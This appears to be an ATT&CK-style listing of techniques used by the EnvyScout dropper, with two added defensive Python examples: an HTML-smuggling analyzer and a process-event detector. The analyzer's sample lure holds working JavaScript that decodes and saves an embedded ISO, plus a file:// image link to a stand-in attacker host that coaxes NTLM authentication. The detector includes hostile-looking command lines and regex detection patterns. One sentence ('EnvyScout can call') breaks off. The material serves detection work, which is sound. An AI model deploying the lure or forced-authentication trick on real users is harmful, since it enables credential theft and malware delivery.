|Enterprise||T1059||.003||Command and Scripting Interpreter: Windows Command Shell||
EnvyScout can use cmd.exe to execute malicious files on compromised hosts.
|Enterprise||T1005||Data from Local System||
EnvyScout can collect sensitive NTLM material from a compromised host.
|Enterprise||T1140||Deobfuscate/Decode Files or Information||
EnvyScout can deobfuscate and write malicious ISO files to disk.
EnvyScout can call
|Enterprise||T1187||Forced Authentication||
EnvyScout can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.
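The two behaviours above (decoding an embedded ISO and writing it to disk, and pointing the OS at a remote resource so it volunteers NTLMv2) are what a triage tool looks for in a suspicious HTML attachment. The analyzer below is an added example, not EnvyScout's code or anything from the ATT&CK page; it assumes the dropper is an HTML/JavaScript file that carries the payload as a base64 blob (optionally string-reversed, an assumed obfuscation) and saves it through the browser's Blob/download APIs. The lure it analyzes is constructed inline, and the host name attacker.example and file name NV.iso are invented.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Long base64 run; leading "=" is allowed so a reversed blob is captured whole.
BASE64_BLOB = re.compile(r"={0,2}[A-Za-z0-9+/]{256,}={0,2}")
# Browser APIs commonly chained to turn a decoded buffer into a file on disk.
SAVE_APIS = ("atob(", "createObjectURL", "msSaveOrOpenBlob", "msSaveBlob", ".download")
# file:// with a remote host, or a UNC path; file:///C:/... has no host and is skipped.
FORCED_AUTH = re.compile(r"file://(?!/)([A-Za-z0-9.\-]+)[/\\]|\\\\([A-Za-z0-9.\-]+)\\")


@dataclass
class SmugglingReport:
    embedded_payloads: list = field(default_factory=list)  # (kind, size in bytes)
    save_to_disk_apis: list = field(default_factory=list)
    forced_auth_hosts: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        drops_file = bool(self.embedded_payloads) and bool(self.save_to_disk_apis)
        return drops_file or bool(self.forced_auth_hosts)


def identify_payload(data: bytes):
    """Classify decoded bytes by magic; ISO 9660 keeps 'CD001' at offset 0x8001."""
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "iso9660"
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"PK\x03\x04":
        return "zip"
    return None


def decode_blob(blob: str):
    """Try the blob as-is and reversed (string reversal is an assumed obfuscation here)."""
    for candidate in (blob, blob[::-1]):
        try:
            data = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            continue
        kind = identify_payload(data)
        if kind:
            return kind, len(data)
    return None


def analyze_html(html: str) -> SmugglingReport:
    report = SmugglingReport()
    for m in BASE64_BLOB.finditer(html):
        found = decode_blob(m.group(0))
        if found:
            report.embedded_payloads.append(found)
    report.save_to_disk_apis = [api for api in SAVE_APIS if api in html]
    for m in FORCED_AUTH.finditer(html):
        report.forced_auth_hosts.append(m.group(1) or m.group(2))
    return report


def build_sample_iso() -> bytes:
    """Constructed ISO 9660 skeleton: 16 empty system sectors, then a primary
    volume descriptor whose 'CD001' identifier lands at byte 0x8001."""
    return b"\x00" * 0x8000 + b"\x01CD001\x01" + b"\x00" * 2041


def build_sample_lure() -> str:
    """Constructed lure, not a real EnvyScout file: reversed base64 ISO decoded in
    JavaScript, saved via browser download APIs, plus an image on a remote file:// share."""
    reversed_b64 = base64.b64encode(build_sample_iso()).decode()[::-1]
    return (
        "<html><body><script>\n"
        "var b64 = '" + reversed_b64 + "'.split('').reverse().join('');\n"
        "var bin = atob(b64);\n"
        "var arr = new Uint8Array(bin.length);\n"
        "for (var i = 0; i < bin.length; i++) { arr[i] = bin.charCodeAt(i); }\n"
        "var blob = new Blob([arr], {type: 'application/octet-stream'});\n"
        "if (window.navigator.msSaveOrOpenBlob) {\n"
        "  window.navigator.msSaveOrOpenBlob(blob, 'NV.iso');\n"
        "} else {\n"
        "  var a = document.createElement('a');\n"
        "  a.href = URL.createObjectURL(blob); a.download = 'NV.iso'; a.click();\n"
        "}\n"
        "</script>\n"
        '<img src="file://attacker.example/share/pixel.png">\n'
        "</body></html>"
    )


if __name__ == "__main__":
    rep = analyze_html(build_sample_lure())
    print("suspicious:", rep.suspicious)
    print("payloads:", rep.embedded_payloads)
    print("save APIs:", rep.save_to_disk_apis)
    print("forced-auth hosts:", rep.forced_auth_hosts)
```

The ISO check deliberately reads the volume descriptor at 0x8001 rather than trusting the file extension in the script, since the name the JavaScript assigns is attacker-controlled. The forced-authentication check only fires for a remote host: a local file:///C:/ reference does not make Windows emit NTLM.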
|Enterprise||T1564||.001||Hide Artifacts: Hidden Files and Directories||
EnvyScout can use hidden directories and files to hide malicious executables.
EnvyScout has used folder icons for malicious files to lure victims into opening them.
|Enterprise||T1027||Obfuscated Files or Information||
|Enterprise||T1566||.001||Phishing: Spearphishing Attachment||
EnvyScout has been distributed via spearphishing as an email attachment.
|Enterprise||T1218||.011||System Binary Proxy Execution: Rundll32||
EnvyScout has the ability to proxy execution of malicious files with Rundll32.
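The cmd.exe, hidden-file and Rundll32 behaviours listed above all surface in process-creation telemetry once the user has opened the dropped ISO. The detection pass below is an added example (not ATT&CK content and not any vendor's rule set) over constructed Sysmon-style events; it assumes the OS lives on C:, so a user-mounted ISO is assigned another drive letter, and every image name, path and file name in the sample events is invented.

```python
import re
from dataclasses import dataclass

SYSTEM_DRIVE = "C:"  # assumption: OS on C:, so a mounted ISO/removable media gets another letter

# First path argument handed to rundll32 (the DLL it will load).
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?\s+"?([A-Za-z]:\\[^,"\s]+)', re.IGNORECASE)
# File launched through "cmd /c" or "cmd /k", optionally via "start".
CMD_TARGET = re.compile(r'cmd(?:\.exe)?\s+/[ck]\s+(?:start\s+)?"?([A-Za-z]:\\[^"\s]+)', re.IGNORECASE)
# attrib setting the hidden or system attribute.
ATTRIB_HIDE = re.compile(r'\battrib(?:\.exe)?\b.*\+[hs]\b', re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str


# Constructed events (Sysmon Event ID 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", "explorer.exe",
                 r"C:\Windows\System32\userinit.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe D:\Docs\Lib.dll,Start",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"cmd.exe /c start D:\Docs\update.exe",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\attrib.exe", r"attrib +h +s D:\Docs",
                 r"C:\Windows\System32\cmd.exe"),
    # Benign: rundll32 loading a DLL from the system directory.
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
                 r"C:\Windows\explorer.exe"),
]


def is_untrusted_path(path: str) -> bool:
    """True for a non-system drive (mounted ISO, removable media) or a user-writable directory."""
    if not path.upper().startswith(SYSTEM_DRIVE.upper()):
        return True
    lowered = path.lower()
    return any(marker in lowered for marker in ("\\users\\", "\\temp\\", "\\programdata\\"))


def basename(image: str) -> str:
    return image.lower().rsplit("\\", 1)[-1]


def detect(events):
    """Return (rule, command_line) pairs for events matching the three behaviours."""
    hits = []
    for ev in events:
        image, parent = basename(ev.image), basename(ev.parent_image)
        if image == "rundll32.exe":
            m = RUNDLL_ARG.search(ev.command_line)
            if m and is_untrusted_path(m.group(1)):
                hits.append(("T1218.011 rundll32 loading DLL from untrusted path", ev.command_line))
        elif image == "cmd.exe" and parent == "explorer.exe":
            m = CMD_TARGET.search(ev.command_line)
            if m and is_untrusted_path(m.group(1)):
                hits.append(("T1059.003 cmd.exe launching file from untrusted path", ev.command_line))
        elif image == "attrib.exe" and ATTRIB_HIDE.search(ev.command_line):
            hits.append(("T1564.001 attrib setting hidden/system attribute", ev.command_line))
    return hits


if __name__ == "__main__":
    for rule, cmdline in detect(SAMPLE_EVENTS):
        print(f"{rule}: {cmdline}")
```

The rundll32 rule keys on where the DLL comes from rather than on rundll32 itself, which is far too common to alert on alone; the cmd.exe rule additionally requires explorer.exe as parent, the shape of a user double-clicking something inside the mounted image.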
|Enterprise||T1082||System Information Discovery||
EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.
|Enterprise||T1204||.002||User Execution: Malicious File||
EnvyScout has been executed through malicious files attached to e-mails.